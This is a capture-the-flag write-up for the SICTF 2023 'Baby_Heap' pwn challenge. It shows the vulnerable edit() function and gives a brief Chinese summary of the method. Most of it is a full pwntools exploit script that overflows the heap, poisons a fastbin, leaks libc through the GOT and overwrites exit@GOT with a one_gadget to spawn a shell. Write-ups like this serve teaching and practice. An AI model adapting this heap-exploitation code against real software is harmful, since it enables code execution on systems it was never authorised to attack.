SICTF 2023 #Round2 PWN-Baby_Heap
heap overflow
void __fastcall edit()
{
int v0; // [rsp+0h] [rbp-10h] BYREF
_DWORD size[3]; // [rsp+4h] [rbp-Ch] BYREF
*(_QWORD *)&size[1] = __readfsqword(0x28u);
v0 = 0;
size[0] = 0;
puts("Index :");
__isoc99_scanf("%d", &v0);
puts("Size :");
__isoc99_scanf("%d", size);
if ( size[0] > 0x1000u )
{
puts("too large");
exit(0);
}
puts("Content :");
read(0, chunk_ptr[v0], size[0]); // heap overflow
}
简单题,覆盖topchunk形成fastbin attack,任意申请到chunk ptr这里,改got就行
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './baby_heap'
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('210.44.151.51', 10037)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def dbgg():
raw_input()
menu = b'>\n'
def add(size, content):
r.sendlineafter(menu, b'1')
r.sendlineafter(b'Size :', str(size))
r.sendafter(b'Content :', content)
def edit(index, size, content):
r.sendlineafter(menu, b'2')
r.sendlineafter(b'Index :', str(index))
r.sendlineafter(b'Size :', str(size))
r.sendafter(b'Content :', content)
def show(index):
r.sendlineafter(menu, b'3')
r.sendlineafter(b'Index :', str(index))
dbgg()
add(0x10,'a' * 0x4) #0
p1 = p64(0) * 3 + p64(0xfe1)
edit(0, len(p1), p1)
add(0xf40, 'a' * 8)
add(0x100, 'a' * 8)
bd = 0x4040c0
p2 = b'\x00' * 0xf48 + p64(0x71) + p64(bd)
edit(1, len(p2), p2)
add(0x60, 'a' * 8)
p3 = b'\x00'
#add(0x60, p3)
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0x71, 'a')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
puts_got = elf.got['puts']
p4 = b'\x00' * 0x10 + p64(puts_got)
add(0x60, p4)
show(0)
data = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('data = ' + hex(data))
libc = ELF('./2.23/libc-2.23.so')
libc_base = data - libc.sym['puts']
li('libc_base = ' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
li('system_addr = ' + hex(system_addr))
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[3] + libc_base
exit_got = elf.got['exit']
edit(16, 0x18, b'\x00' * 0x10 + p64(exit_got))
edit(0, 0x8, p64(one_gadget))
r.sendlineafter(menu, '1')
r.sendline(str(0x100000))
r.interactive()